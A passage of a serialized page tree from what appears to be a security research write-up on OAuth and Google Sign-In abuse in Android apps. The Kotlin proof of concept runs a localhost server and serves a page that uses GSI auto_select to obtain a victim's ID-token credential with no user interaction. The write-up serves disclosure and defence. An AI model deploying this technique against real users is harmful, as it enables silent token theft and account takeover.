100174],{"type":33,"value":373},{"type":28,"tag":116,"props":100176,"children":100177},{"style":563},[100178],{"type":33,"value":70524},{"type":28,"tag":116,"props":100180,"children":100181},{"style":266},[100182],{"type":33,"value":2830},{"type":28,"tag":116,"props":100184,"children":100185},{"class":245,"line":1262},[100186,100190,100194,100198,100202,100206,100210,100214],{"type":28,"tag":116,"props":100187,"children":100188},{"style":282},[100189],{"type":33,"value":70510},{"type":28,"tag":116,"props":100191,"children":100192},{"style":266},[100193],{"type":33,"value":70540},{"type":28,"tag":116,"props":100195,"children":100196},{"style":370},[100197],{"type":33,"value":373},{"type":28,"tag":116,"props":100199,"children":100200},{"style":563},[100201],{"type":33,"value":70549},{"type":28,"tag":116,"props":100203,"children":100204},{"style":266},[100205],{"type":33,"value":70554},{"type":28,"tag":116,"props":100207,"children":100208},{"style":370},[100209],{"type":33,"value":373},{"type":28,"tag":116,"props":100211,"children":100212},{"style":563},[100213],{"type":33,"value":70563},{"type":28,"tag":116,"props":100215,"children":100216},{"style":266},[100217],{"type":33,"value":2830},{"type":28,"tag":116,"props":100219,"children":100220},{"class":245,"line":1294},[100221,100225,100229,100233],{"type":28,"tag":116,"props":100222,"children":100223},{"style":282},[100224],{"type":33,"value":70575},{"type":28,"tag":116,"props":100226,"children":100227},{"style":266},[100228],{"type":33,"value":313},{"type":28,"tag":116,"props":100230,"children":100231},{"style":563},[100232],{"type":33,"value":70584},{"type":28,"tag":116,"props":100234,"children":100235},{"style":266},[100236],{"type":33,"value":2830},{"type":28,"tag":116,"props":100238,"children":100239},{"class":245,"line":1334},[100240],{"type":28,"tag":116,"props":100241,"children":100242},{"style":266},[100243],{"type":33,"value":70596},{"type":28,"tag":116,"props":100245,"children":100246},{"class":245,"line":1372},[100247,100251],{"type":28,"tag":116,"props":100248,"children":100249},{"style":282},[100250],{"type":33,"value":70604},{"type":28,"tag":116,"props":100252,"children":100253},{"style":266},[100254],{"type":33,"value":1291},{"type":28,"tag":116,"props":100256,"children":100257},{"class":245,"line":1381},[100258,100262,100266,100270,100274],{"type":28,"tag":116,"props":100259,"children":100260},{"style":282},[100261],{"type":33,"value":70616},{"type":28,"tag":116,"props":100263,"children":100264},{"style":266},[100265],{"type":33,"value":9254},{"type":28,"tag":116,"props":100267,"children":100268},{"style":370},[100269],{"type":33,"value":2268},{"type":28,"tag":116,"props":100271,"children":100272},{"style":563},[100273],{"type":33,"value":70629},{"type":28,"tag":116,"props":100275,"children":100276},{"style":266},[100277],{"type":33,"value":9264},{"type":28,"tag":116,"props":100279,"children":100280},{"class":245,"line":1389},[100281,100285],{"type":28,"tag":116,"props":100282,"children":100283},{"style":282},[100284],{"type":33,"value":70641},{"type":28,"tag":116,"props":100286,"children":100287},{"style":266},[100288],{"type":33,"value":1291},{"type":28,"tag":116,"props":100290,"children":100291},{"class":245,"line":1425},[100292,100296],{"type":28,"tag":116,"props":100293,"children":100294},{"style":370},[100295],{"type":33,"value":70653},{"type":28,"tag":116,"props":100297,"children":100298},{"style":563},[100299],{"type":33,"value":100300},"\"document.body.innerText = location.hash;\"\n",{"type":28,"tag":116,"props":100302,"children":100303},{"class":245,"line":1448},[100304],{"type":28,"tag":116,"props":100305,"children":100306},{"style":266},[100307],{"type":33,"value":70666},{"type":28,"tag":116,"props":100309,"children":100310},{"class":245,"line":1456},[100311],{"type":28,"tag":116,"props":100312,"children":100313},{"style":266},[100314],{"type":33,"value":70596},{"type":28,"tag":116,"props":100316,"children":100317},{"class":245,"line":1520},[100318],{"type":28,"tag":116,"props":100319,"children":100320},{"style":266},[100321],{"type":33,"value":70681},{"type":28,"tag":116,"props":100323,"children":100324},{"class":245,"line":1580},[100325],{"type":28,"tag":116,"props":100326,"children":100327},{"style":266},[100328],{"type":33,"value":70689},{"type":28,"tag":116,"props":100330,"children":100331},{"class":245,"line":1620},[100332],{"type":28,"tag":116,"props":100333,"children":100334},{"style":266},[100335],{"type":33,"value":58503},{"type":28,"tag":116,"props":100337,"children":100338},{"class":245,"line":1668},[100339,100343,100347,100351,100355,100359],{"type":28,"tag":116,"props":100340,"children":100341},{"style":266},[100342],{"type":33,"value":70704},{"type":28,"tag":116,"props":100344,"children":100345},{"style":282},[100346],{"type":33,"value":70709},{"type":28,"tag":116,"props":100348,"children":100349},{"style":266},[100350],{"type":33,"value":70714},{"type":28,"tag":116,"props":100352,"children":100353},{"style":370},[100354],{"type":33,"value":373},{"type":28,"tag":116,"props":100356,"children":100357},{"style":376},[100358],{"type":33,"value":1129},{"type":28,"tag":116,"props":100360,"children":100361},{"style":266},[100362],{"type":33,"value":2830},{"type":28,"tag":116,"props":100364,"children":100365},{"class":245,"line":1677},[100366],{"type":28,"tag":116,"props":100367,"children":100368},{"style":266},[100369],{"type":33,"value":3025},{"type":28,"tag":29,"props":100371,"children":100372},{},[100373],{"type":33,"value":100374},"In this case, the prompt parameter can be omitted from the URL. This way, if the victim is already logged in, the OAuth 2.0 prompt interaction will be skipped.",{"type":28,"tag":29,"props":100376,"children":100377},{},[100378,100380,100386],{"type":33,"value":100379},"If Google Sign-In (GSI) is being used, we found that it's possible to use the ",{"type":28,"tag":98,"props":100381,"children":100383},{"className":100382},[],[100384],{"type":33,"value":100385},"auto_select",{"type":33,"value":100387}," parameter to trigger automatic reauthentication and bypass user interaction:",{"type":28,"tag":234,"props":100389,"children":100391},{"className":99747,"code":100390,"language":99749,"meta":7,"style":7},"    override fun onCreate(savedInstanceState: Bundle?) {\n        super.onCreate(savedInstanceState)\n\n        CoroutineScope(Dispatchers.IO).launch {\n            try {\n                startWebServer()\n                Log.d(\"WebServer\", \"Server started on http://localhost:3000\")\n            } catch (e: Exception) {\n                Log.e(\"WebServer\", \"Error starting server: ${e.message}\", e)\n            }\n        }\n\n        val browserIntent = Intent(Intent.ACTION_VIEW, Uri.parse(\"http://localhost:3000\"))\n        startActivity(browserIntent)\n    }\n\n    private fun startWebServer() {\n        embeddedServer(CIO, port = 3000) {\n            routing {\n                get(\"{...}\") {\n                    call.respondHtml {\n                        head {\n                            title(\"Test\")\n                            script {\n                                src = \"https://accounts.google.com/gsi/client\"\n                                attributes[\"async\"] = \"\"\n                                attributes[\"defer\"] = \"\"\n                            }\n                            script {\n                                unsafe {\n                                    +\"\"\"\n    function handleCredentialResponse(response) {\n      alert(\"credential: \" + response.credential);\n    }\n\n    window.onload = async function () {\n      const oauth_url = new URL(`https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?as=uolEFCMgoGJXBVuGdJja0XdzjrWqOE6iFaK1SBNY9Zk&client_id=redacted&scope=openid%20email%20profile&response_type=id_token&gsiwebsdk=gis_attributes&redirect_uri=http%3A%2F%2Flocalhost%3A3000&response_mode=form_post&origin=http%3A%2F%2Flocalhost%3A3000&display=popup&prompt=select_account&gis_params=ChFodHRwczovL2F6Yml0LmNvbRIRaHR0cHM6Ly9hemJpdC5jb20YByordW9sRUZDTWdvR0pYQlZ1R2RKamEwWGR6anJXcU9FNmlGYUsxU0JOWTlaazJINzE3OTQyNTg0NjQyLXVrb25tbDZkNXM0MjJrZWVpa2RmMTJwdnV1aG1sOWYyLmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29tOAFCQDI0NDlkNGMwMTI3NDQxNGRlMzg5YjFlYjE1MzFmYTAxYTdjM2M5MTFhOTMxNzIxNGJhZTFmODkzNjE2MzIxZDA&service=lso&o2v=1&flowName=GeneralOAuthFlow`);\n      const client_id = oauth_url.searchParams.get(\"client_id\");\n      google.accounts.id.initialize({\n        client_id: client_id,\n        callback: handleCredentialResponse,\n        auto_select: true\n      });\n\n      google.accounts.id.renderButton(\n        document.getElementById(\"g_id_signin\"),\n        { theme: \"outline\", size: \"large\" }\n      );\n\n      google.accounts.id.prompt();\n    };\n                                    \"\"\".trimIndent()\n                                }\n                            }\n                        }\n                        body {\n                            h1 { +\"Login here:\" }\n                            div {\n                                id = \"g_id_signin\"\n                            }\n                        }\n                    }\n                }\n            }\n        }.start(wait = true)\n    }\n",[100392],{"type":28,"tag":98,"props":100393,"children":100394},{"__ignoreMap":7},[100395,100422,100441,100448,100467,100478,100489,100520,100543,100590,100597,100604,100611,100651,100662,100669,100676,100695,100718,100729,100748,100763,100774,100794,100805,100822,100848,100872,100879,100890,100902,100915,100923,100931,100938,100945,100953,100961,100969,100977,100985,100993,101001,101008,101015,101023,101031,101039,101046,101053,101061,101068,101089,101097,101104,101111,101122,101146,101158,101175,101182,101189,101197,101205,101213,101241],{"type":28,"tag":116,"props":100396,"children":100397},{"class":245,"line":246},[100398,100402,100406,100410,100414,100418],{"type":28,"tag":116,"props":100399,"children":100400},{"style":376},[100401],{"type":33,"value":70063},{"type":28,"tag":116,"props":100403,"children":100404},{"style":376},[100405],{"type":33,"value":5878},{"type":28,"tag":116,"props":100407,"children":100408},{"style":282},[100409],{"type":33,"value":70072},{"type":28,"tag":116,"props":100411,"children":100412},{"style":266},[100413],{"type":33,"value":70077},{"type":28,"tag":116,"props":100415,"children":100416},{"style":339},[100417],{"type":33,"value":70082},{"type":28,"tag":116,"props":100419,"children":100420},{"style":266},[100421],{"type":33,"value":70087},{"type":28,"tag":116,"props":100423,"children":100424},{"class":245,"line":256},[100425,100429,100433,100437],{"type":28,"tag":116,"props":100426,"children":100427},{"style":376},[100428],{"type":33,"value":70095},{"type":28,"tag":116,"props":100430,"children":100431},{"style":266},[100432],{"type":33,"value":141},{"type":28,"tag":116,"props":100434,"children":100435},{"style":282},[100436],{"type":33,"value":70104},{"type":28,"tag":116,"props":100438,"children":100439},{"style":266},[100440],{"type":33,"value":70109},{"type":28,"tag":116,"props":100442,"children":100443},{"class":245,"line":293},[100444],{"type":28,"tag":116,"props":100445,"children":100446},{"emptyLinePlaceholder":19},[100447],{"type":33,"value":1044},{"type":28,"tag":116,"props":100449,"children":100450},{"class":245,"line":361},[100451,100455,100459,100463],{"type":28,"tag":116,"props":100452,"children":100453},{"style":282},[100454],{"type":33,"value":70132},{"type":28,"tag":116,"props":100456,"children":100457},{"style":266},[100458],{"type":33,"value":70137},{"type":28,"tag":116,"props":100460,"children":100461},{"style":282},[100462],{"type":33,"value":70142},{"type":28,"tag":116,"props":100464,"children":100465},{"style":266},[100466],{"type":33,"value":1291},{"type":28,"tag":116,"props":100468,"children":100469},{"class":245,"line":387},[100470,100474],{"type":28,"tag":116,"props":100471,"children":100472},{"style":260},[100473],{"type":33,"value":70154},{"type":28,"tag":116,"props":100475,"children":100476},{"style":266},[100477],{"type":33,"value":1291},{"type":28,"tag":116,"props":100479,"children":100480},{"class":245,"line":400},[100481,100485],{"type":28,"tag":116,"props":100482,"children":100483},{"style":282},[100484],{"type":33,"value":70166},{"type":28,"tag":116,"props":100486,"children":100487},{"style":266},[100488],{"type":33,"value":7407},{"type":28,"tag":116,"props":100490,"children":100491},{"class":245,"line":614},[100492,100496,100500,100504,100508,100512,100516],{"type":28,"tag":116,"props":100493,"children":100494},{"style":266},[100495],{"type":33,"value":70178},{"type":28,"tag":116,"props":100497,"children":100498},{"style":282},[100499],{"type":33,"value":70183},{"type":28,"tag":116,"props":100501,"children":100502},{"style":266},[100503],{"type":33,"value":313},{"type":28,"tag":116,"props":100505,"children":100506},{"style":563},[100507],{"type":33,"value":70192},{"type":28,"tag":116,"props":100509,"children":100510},{"style":266},[100511],{"type":33,"value":825},{"type":28,"tag":116,"props":100513,"children":100514},{"style":563},[100515],{"type":33,"value":70201},{"type":28,"tag":116,"props":100517,"children":100518},{"style":266},[100519],{"type":33,"value":2830},{"type":28,"tag":116,"props":100521,"children":100522},{"class":245,"line":631},[100523,100527,100531,100535,100539],{"type":28,"tag":116,"props":100524,"children":100525},{"style":266},[100526],{"type":33,"value":70213},{"type":28,"tag":116,"props":100528,"children":100529},{"style":376},[100530],{"type":33,"value":48033},{"type":28,"tag":116,"props":100532,"children":100533},{"style":266},[100534],{"type":33,"value":70222},{"type":28,"tag":116,"props":100536,"children":100537},{"style":339},[100538],{"type":33,"value":70227},{"type":28,"tag":116,"props":100540,"children":100541},{"style":266},[100542],{"type":33,"value":844},{"type":28,"tag":116,"props":100544,"children":100545},{"class":245,"line":665},[100546,100550,100554,100558,100562,100566,100570,100574,100578,100582,100586],{"type":28,"tag":116,"props":100547,"children":100548},{"style":266},[100549],{"type":33,"value":70178},{"type":28,"tag":116,"props":100551,"children":100552},{"style":282},[100553],{"type":33,"value":1413},{"type":28,"tag":116,"props":100555,"children":100556},{"style":266},[100557],{"type":33,"value":313},{"type":28,"tag":116,"props":100559,"children":100560},{"style":563},[100561],{"type":33,"value":70192},{"type":28,"tag":116,"props":100563,"children":100564},{"style":266},[100565],{"type":33,"value":825},{"type":28,"tag":116,"props":100567,"children":100568},{"style":563},[100569],{"type":33,"value":70259},{"type":28,"tag":116,"props":100571,"children":100572},{"style":376},[100573],{"type":33,"value":867},{"type":28,"tag":116,"props":100575,"children":100576},{"style":370},[100577],{"type":33,"value":70268},{"type":28,"tag":116,"props":100579,"children":100580},{"style":376},[100581],{"type":33,"value":885},{"type":28,"tag":116,"props":100583,"children":100584},{"style":563},[100585],{"type":33,"value":2240},{"type":28,"tag":116,"props":100587,"children":100588},{"style":266},[100589],{"type":33,"value":70281},{"type":28,"tag":116,"props":100591,"children":100592},{"class":245,"line":713},[100593],{"type":28,"tag":116,"props":100594,"children":100595},{"style":266},[100596],{"type":33,"value":58503},{"type":28,"tag":116,"props":100598,"children":100599},{"class":245,"line":750},[100600],{"type":28,"tag":116,"props":100601,"children":100602},{"style":266},[100603],{"type":33,"value":1954},{"type":28,"tag":116,"props":100605,"children":100606},{"class":245,"line":779},[100607],{"type":28,"tag":116,"props":100608,"children":100609},{"emptyLinePlaceholder":19},[100610],{"type":33,"value":1044},{"type":28,"tag":116,"props":100612,"children":100613},{"class":245,"line":796},[100614,100618,100622,100626,100630,100634,100638,100642,100647],{"type":28,"tag":116,"props":100615,"children":100616},{"style":376},[100617],{"type":33,"value":70318},{"type":28,"tag":116,"props":100619,"children":100620},{"style":266},[100621],{"type":33,"value":70344},{"type":28,"tag":116,"props":100623,"children":100624},{"style":370},[100625],{"type":33,"value":373},{"type":28,"tag":116,"props":100627,"children":100628},{"style":282},[100629],{"type":33,"value":70353},{"type":28,"tag":116,"props":100631,"children":100632},{"style":266},[100633],{"type":33,"value":70358},{"type":28,"tag":116,"props":100635,"children":100636},{"style":282},[100637],{"type":33,"value":38833},{"type":28,"tag":116,"props":100639,"children":100640},{"style":266},[100641],{"type":33,"value":313},{"type":28,"tag":116,"props":100643,"children":100644},{"style":563},[100645],{"type":33,"value":100646},"\"http://localhost:3000\"",{"type":28,"tag":116,"props":100648,"children":100649},{"style":266},[100650],{"type":33,"value":19376},{"type":28,"tag":116,"props":100652,"children":100653},{"class":245,"line":847},[100654,100658],{"type":28,"tag":116,"props":100655,"children":100656},{"style":282},[100657],{"type":33,"value":70375},{"type":28,"tag":116,"props":100659,"children":100660},{"style":266},[100661],{"type":33,"value":70380},{"type":28,"tag":116,"props":100663,"children":100664},{"class":245,"line":898},[100665],{"type":28,"tag":116,"props":100666,"children":100667},{"style":266},[100668],{"type":33,"value":3025},{"type":28,"tag":116,"props":100670,"children":100671},{"class":245,"line":907},[100672],{"type":28,"tag":116,"props":100673,"children":100674},{"emptyLinePlaceholder":19},[100675],{"type":33,"value":1044},{"type":28,"tag":116,"props":100677,"children":100678},{"class":245,"line":981},[100679,100683,100687,100691],{"type":28,"tag":116,"props":100680,"children":100681},{"style":376},[100682],{"type":33,"value":2164},{"type":28,"tag":116,"props":100684,"children":100685},{"style":376},[100686],{"type":33,"value":5878},{"type":28,"tag":116,"props":100688,"children":100689},{"style":282},[100690],{"type":33,"value":70410},{"type":28,"tag":116,"props":100692,"children":100693},{"style":266},[100694],{"type":33,"value":1068},{"type":28,"tag":116,"props":100696,"children":100697},{"class":245,"line":1011},[100698,100702,100706,100710,100714],{"type":28,"tag":116,"props":100699,"children":100700},{"style":282},[100701],{"type":33,"value":70422},{"type":28,"tag":116,"props":100703,"children":100704},{"style":266},[100705],{"type":33,"value":70427},{"type":28,"tag":116,"props":100707,"children":100708},{"style":370},[100709],{"type":33,"value":373},{"type":28,"tag":116,"props":100711,"children":100712},{"style":350},[100713],{"type":33,"value":70436},{"type":28,"tag":116,"props":100715,"children":100716},{"style":266},[100717],{"type":33,"value":844},{"type":28,"tag":116,"props":100719,"children":100720},{"class":245,"line":1029},[100721,100725],{"type":28,"tag":116,"props":100722,"children":100723},{"style":282},[100724],{"type":33,"value":70448},{"type":28,"tag":116,"props":100726,"children":100727},{"style":266},[100728],{"type":33,"value":1291},{"type":28,"tag":116,"props":100730,"children":100731},{"class":245,"line":1038},[100732,100736,100740,100744],{"type":28,"tag":116,"props":100733,"children":100734},{"style":376},[100735],{"type":33,"value":70460},{"type":28,"tag":116,"props":100737,"children":100738},{"style":266},[100739],{"type":33,"value":313},{"type":28,"tag":116,"props":100741,"children":100742},{"style":563},[100743],{"type":33,"value":70469},{"type":28,"tag":116,"props":100745,"children":100746},{"style":266},[100747],{"type":33,"value":844},{"type":28,"tag":116,"props":100749,"children":100750},{"class":245,"line":1047},[100751,100755,100759],{"type":28,"tag":116,"props":100752,"children":100753},{"style":266},[100754],{"type":33,"value":70481},{"type":28,"tag":116,"props":100756,"children":100757},{"style":282},[100758],{"type":33,"value":70486},{"type":28,"tag":116,"props":100760,"children":100761},{"style":266},[100762],{"type":33,"value":1291},{"type":28,"tag":116,"props":100764,"children":100765},{"class":245,"line":1071},[100766,100770],{"type":28,"tag":116,"props":100767,"children":100768},{"style":282},[100769],{"type":33,"value":70498},{"type":28,"tag":116,"props":100771,"children":100772},{"style":266},[100773],{"type":33,"value":1291},{"type":28,"tag":116,"props":100775,"children":100776},{"class":245,"line":1137},[100777,100781,100785,100790],{"type":28,"tag":116,"props":100778,"children":100779},{"style":282},[100780],{"type":33,"value":70575},{"type":28,"tag":116,"props":100782,"children":100783},{"style":266},[100784],{"type":33,"value":313},{"type":28,"tag":116,"props":100786,"children":100787},{"style":563},[100788],{"type":33,"value":100789},"\"Test\"",{"type":28,"tag":116,"props":100791,"children":100792},{"style":266},[100793],{"type":33,"value":2830},{"type":28,"tag":116,"props":100795,"children":100796},{"class":245,"line":1181},[100797,100801],{"type":28,"tag":116,"props":100798,"children":100799},{"style":282},[100800],{"type":33,"value":70641},{"type":28,"tag":116,"props":100802,"children":100803},{"style":266},[100804],{"type":33,"value":1291},{"type":28,"tag":116,"props":100806,"children":100807},{"class":245,"line":1212},[100808,100813,100817],{"type":28,"tag":116,"props":100809,"children":100810},{"style":266},[100811],{"type":33,"value":100812},"                                src ",{"type":28,"tag":116,"props":100814,"children":100815},{"style":370},[100816],{"type":33,"value":373},{"type":28,"tag":116,"props":100818,"children":100819},{"style":563},[100820],{"type":33,"value":100821}," \"https://accounts.google.com/gsi/client\"\n",{"type":28,"tag":116,"props":100823,"children":100824},{"class":245,"line":1254},[100825,100830,100835,100839,100843],{"type":28,"tag":116,"props":100826,"children":100827},{"style":266},[100828],{"type":33,"value":100829},"                                attributes[",{"type":28,"tag":116,"props":100831,"children":100832},{"style":563},[100833],{"type":33,"value":100834},"\"async\"",{"type":28,"tag":116,"props":100836,"children":100837},{"style":266},[100838],{"type":33,"value":8333},{"type":28,"tag":116,"props":100840,"children":100841},{"style":370},[100842],{"type":33,"value":373},{"type":28,"tag":116,"props":100844,"children":100845},{"style":563},[100846],{"type":33,"value":100847}," \"\"\n",{"type":28,"tag":116,"props":100849,"children":100850},{"class":245,"line":1262},[100851,100855,100860,100864,100868],{"type":28,"tag":116,"props":100852,"children":100853},{"style":266},[100854],{"type":33,"value":100829},{"type":28,"tag":116,"props":100856,"children":100857},{"style":563},[100858],{"type":33,"value":100859},"\"defer\"",{"type":28,"tag":116,"props":100861,"children":100862},{"style":266},[100863],{"type":33,"value":8333},{"type":28,"tag":116,"props":100865,"children":100866},{"style":370},[100867],{"type":33,"value":373},{"type":28,"tag":116,"props":100869,"children":100870},{"style":563},[100871],{"type":33,"value":100847},{"type":28,"tag":116,"props":100873,"children":100874},{"class":245,"line":1294},[100875],{"type":28,"tag":116,"props":100876,"children":100877},{"style":266},[100878],{"type":33,"value":70666},{"type":28,"tag":116,"props":100880,"children":100881},{"class":245,"line":1334},[100882,100886],{"type":28,"tag":116,"props":100883,"children":100884},{"style":282},[100885],{"type":33,"value":70641},{"type":28,"tag":116,"props":100887,"children":100888},{"style":266},[100889],{"type":33,"value":1291},{"type":28,"tag":116,"props":100891,"children":100892},{"class":245,"line":1372},[100893,100898],{"type":28,"tag":116,"props":100894,"children":100895},{"style":282},[100896],{"type":33,"value":100897},"                                unsafe",{"type":28,"tag":116,"props":100899,"children":100900},{"style":266},[100901],{"type":33,"value":1291},{"type":28,"tag":116,"props":100903,"children":100904},{"class":245,"line":1381},[100905,100910],{"type":28,"tag":116,"props":100906,"children":100907},{"style":370},[100908],{"type":33,"value":100909},"                                    +",{"type":28,"tag":116,"props":100911,"children":100912},{"style":563},[100913],{"type":33,"value":100914},"\"\"\"\n",{"type":28,"tag":116,"props":100916,"children":100917},{"class":245,"line":1389},[100918],{"type":28,"tag":116,"props":100919,"children":100920},{"style":563},[100921],{"type":33,"value":100922},"    function handleCredentialResponse(response) {\n",{"type":28,"tag":116,"props":100924,"children":100925},{"class":245,"line":1425},[100926],{"type":28,"tag":116,"props":100927,"children":100928},{"style":563},[100929],{"type":33,"value":100930},"      alert(\"credential: \" + response.credential);\n",{"type":28,"tag":116,"props":100932,"children":100933},{"class":245,"line":1448},[100934],{"type":28,"tag":116,"props":100935,"children":100936},{"style":563},[100937],{"type":33,"value":3025},{"type":28,"tag":116,"props":100939,"children":100940},{"class":245,"line":1456},[100941],{"type":28,"tag":116,"props":100942,"children":100943},{"emptyLinePlaceholder":19},[100944],{"type":33,"value":1044},{"type":28,"tag":116,"props":100946,"children":100947},{"class":245,"line":1520},[100948],{"type":28,"tag":116,"props":100949,"children":100950},{"style":563},[100951],{"type":33,"value":100952},"    window.onload = async function () {\n",{"type":28,"tag":116,"props":100954,"children":100955},{"class":245,"line":1580},[100956],{"type":28,"tag":116,"props":100957,"children":100958},{"style":563},[100959],{"type":33,"value":100960},"      const oauth_url = new URL(`https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?as=uolEFCMgoGJXBVuGdJja0XdzjrWqOE6iFaK1SBNY9Zk&client_id=redacted&scope=openid%20email%20profile&response_type=id_token&gsiwebsdk=gis_attributes&redirect_uri=http%3A%2F%2Flocalhost%3A3000&response_mode=form_post&origin=http%3A%2F%2Flocalhost%3A3000&display=popup&prompt=select_account&gis_params=ChFodHRwczovL2F6Yml0LmNvbRIRaHR0cHM6Ly9hemJpdC5jb20YByordW9sRUZDTWdvR0pYQlZ1R2RKamEwWGR6anJXcU9FNmlGYUsxU0JOWTlaazJINzE3OTQyNTg0NjQyLXVrb25tbDZkNXM0MjJrZWVpa2RmMTJwdnV1aG1sOWYyLmFwcHMuZ29vZ2xldXNlcmNvbnRlbnQuY29tOAFCQDI0NDlkNGMwMTI3NDQxNGRlMzg5YjFlYjE1MzFmYTAxYTdjM2M5MTFhOTMxNzIxNGJhZTFmODkzNjE2MzIxZDA&service=lso&o2v=1&flowName=GeneralOAuthFlow`);\n",{"type":28,"tag":116,"props":100962,"children":100963},{"class":245,"line":1620},[100964],{"type":28,"tag":116,"props":100965,"children":100966},{"style":563},[100967],{"type":33,"value":100968},"      const client_id = oauth_url.searchParams.get(\"client_id\");\n",{"type":28,"tag":116,"props":100970,"children":100971},{"class":245,"line":1668},[100972],{"type":28,"tag":116,"props":100973,"children":100974},{"style":563},[100975],{"type":33,"value":100976},"      google.accounts.id.initialize({\n",{"type":28,"tag":116,"props":100978,"children":100979},{"class":245,"line":1677},[100980],{"type":28,"tag":116,"props":100981,"children":100982},{"style":563},[100983],{"type":33,"value":100984},"        client_id: client_id,\n",{"type":28,"tag":116,"props":100986,"children":100987},{"class":245,"line":1685},[100988],{"type":28,"tag":116,"props":100989,"children":100990},{"style":563},[100991],{"type":33,"value":100992},"        callback: handleCredentialResponse,\n",{"type":28,"tag":116,"props":100994,"children":100995},{"class":245,"line":1729},[100996],{"type":28,"tag":116,"props":100997,"children":100998},{"style":563},[100999],{"type":33,"value":101000},"        auto_select: true\n",{"type":28,"tag":116,"props":101002,"children":101003},{"class":245,"line":1764},[101004],{"type":28,"tag":116,"props":101005,"children":101006},{"style":563},[101007],{"type":33,"value":6967},{"type":28,"tag":116,"props":101009,"children":101010},{"class":245,"line":1896},[101011],{"type":28,"tag":116,"props":101012,"children":101013},{"emptyLinePlaceholder":19},[101014],{"type":33,"value":1044},{"type":28,"tag":116,"props":101016,"children":101017},{"class":245,"line":1932},[101018],{"type":28,"tag":116,"props":101019,"children":101020},{"style":563},[101021],{"type":33,"value":101022},"      google.accounts.id.renderButton(\n",{"type":28,"tag":116,"props":101024,"children":101025},{"class":245,"line":1940},[101026],{"type":28,"tag":116,"props":101027,"children":101028},{"style":563},[101029],{"type":33,"value":101030},"        document.getElementById(\"g_id_signin\"),\n",{"type":28,"tag":116,"props":101032,"children":101033},{"class":245,"line":1948},[101034],{"type":28,"tag":116,"props":101035,"children":101036},{"style":563},[101037],{"type":33,"value":101038},"        { theme: \"outline\", size: \"large\" }\n",{"type":28,"tag":116,"props":101040,"children":101041},{"class":245,"line":1957},[101042],{"type":28,"tag":116,"props":101043,"children":101044},{"style":563},[101045],{"type":33,"value":6438},{"type":28,"tag":116,"props":101047,"children":101048},{"class":245,"line":1970},[101049],{"type":28,"tag":116,"props":101050,"children":101051},{"emptyLinePlaceholder":19},[101052],{"type":33,"value":1044},{"type":28,"tag":116,"props":101054,"children":101055},{"class":245,"line":1987},[101056],{"type":28,"tag":116,"props":101057,"children":101058},{"style":563},[101059],{"type":33,"value":101060},"      google.accounts.id.prompt();\n",{"type":28,"tag":116,"props":101062,"children":101063},{"class":245,"line":2003},[101064],{"type":28,"tag":116,"props":101065,"children":101066},{"style":563},[101067],{"type":33,"value":38618},{"type":28,"tag":116,"props":101069,"children":101070},{"class":245,"line":31949},[101071,101076,101080,101085],{"type":28,"tag":116,"props":101072,"children":101073},{"style":563},[101074],{"type":33,"value":101075},"                                    \"\"\"",{"type":28,"tag":116,"props":101077,"children":101078},{"style":266},[101079],{"type":33,"value":141},{"type":28,"tag":116,"props":101081,"children":101082},{"style":282},[101083],{"type":33,"value":101084},"trimIndent",{"type":28,"tag":116,"props":101086,"children":101087},{"style":266},[101088],{"type":33,"value":7407},{"type":28,"tag":116,"props":101090,"children":101091},{"class":245,"line":80570},[101092],{"type":28,"tag":116,"props":101093,"children":101094},{"style":266},[101095],{"type":33,"value":101096},"                                }\n",{"type":28,"tag":116,"props":101098,"children":101099},{"class":245,"line":80583},[101100],{"type":28,"tag":116,"props":101101,"children":101102},{"style":266},[101103],{"type":33,"value":70666},{"type":28,"tag":116,"props":101105,"children":101106},{"class":245,"line":80591},[101107],{"type":28,"tag":116,"props":101108,"children":101109},{"style":266},[101110],{"type":33,"value":70596},{"type":28,"tag":116,"props":101112,"children":101113},{"class":245,"line":80599},[101114,101118],{"type":28,"tag":116,"props":101115,"children":101116},{"style":282},[101117],{"type":33,"value":70604},{"type":28,"tag":116,"props":101119,"children":101120},{"style":266},[101121],{"type":33,"value":1291},{"type":28,"tag":116,"props":101123,"children":101124},{"class":245,"line":80607},[101125,101129,101133,101137,101142],{"type":28,"tag":116,"props":101126,"children":101127},{"style":282},[101128],{"type":33,"value":70616},{"type":28,"tag":116,"props":101130,"children":101131},{"style":266},[101132],{"type":33,"value":9254},{"type":28,"tag":116,"props":101134,"children":101135},{"style":370},[101136],{"type":33,"value":2268},{"type":28,"tag":116,"props":101138,"children":101139},{"style":563},[101140],{"type":33,"value":101141},"\"Login here:\"",{"type":28,"tag":116,"props":101143,"children":101144},{"style":266},[101145],{"type":33,"value":9264},{"type":28,"tag":116,"props":101147,"children":101148},{"class":245,"line":80647},[101149,101154],{"type":28,"tag":116,"props":101150,"children":101151},{"style":282},[101152],{"type":33,"value":101153},"                            div",{"type":28,"tag":116,"props":101155,"children":101156},{"style":266},[101157],{"type":33,"value":1291},{"type":28,"tag":116,"props":101159,"children":101160},{"class":245,"line":80655},[101161,101166,101170],{"type":28,"tag":116,"props":101162,"children":101163},{"style":266},[101164],{"type":33,"value":101165},"                                id ",{"type":28,"tag":116,"props":101167,"children":101168},{"style":370},[101169],{"type":33,"value":373},{"type":28,"tag":116,"props":101171,"children":101172},{"style":563},[101173],{"type":33,"value":101174}," \"g_id_signin\"\n",{"type":28,"tag":116,"props":101176,"children":101177},{"class":245,"line":87841},[101178],{"type":28,"tag":116,"props":101179,"children":101180},{"style":266},[101181],{"type":33,"value":70666},{"type":28,"tag":116,"props":101183,"children":101184},{"class":245,"line":87849},[101185],{"type":28,"tag":116,"props":101186,"children":101187},{"style":266},[101188],{"type":33,"value":70596},{"type":28,"tag":116,"props":101190,"children":101192},{"class":245,"line":101191},62,[101193],{"type":28,"tag":116,"props":101194,"children":101195},{"style":266},[101196],{"type":33,"value":70681},{"type":28,"tag":116,"props":101198,"children":101200},{"class":245,"line":101199},63,[101201],{"type":28,"tag":116,"props":101202,"children":101203},{"style":266},[101204],{"type":33,"value":70689},{"type":28,"tag":116,"props":101206,"children":101208},{"class":245,"line":101207},64,[101209],{"type":28,"tag":116,"props":101210,"children":101211},{"style":266},[101212],{"type":33,"value":58503},{"type":28,"tag":116,"props":101214,"children":101216},{"class":245,"line":101215},65,[101217,101221,101225,101229,101233,101237],{"type":28,"tag":116,"props":101218,"children":101219},{"style":266},[101220],{"type":33,"value":70704},{"type":28,"tag":116,"props":101222,"children":101223},{"style":282},[101224],{"type":33,"value":70709},{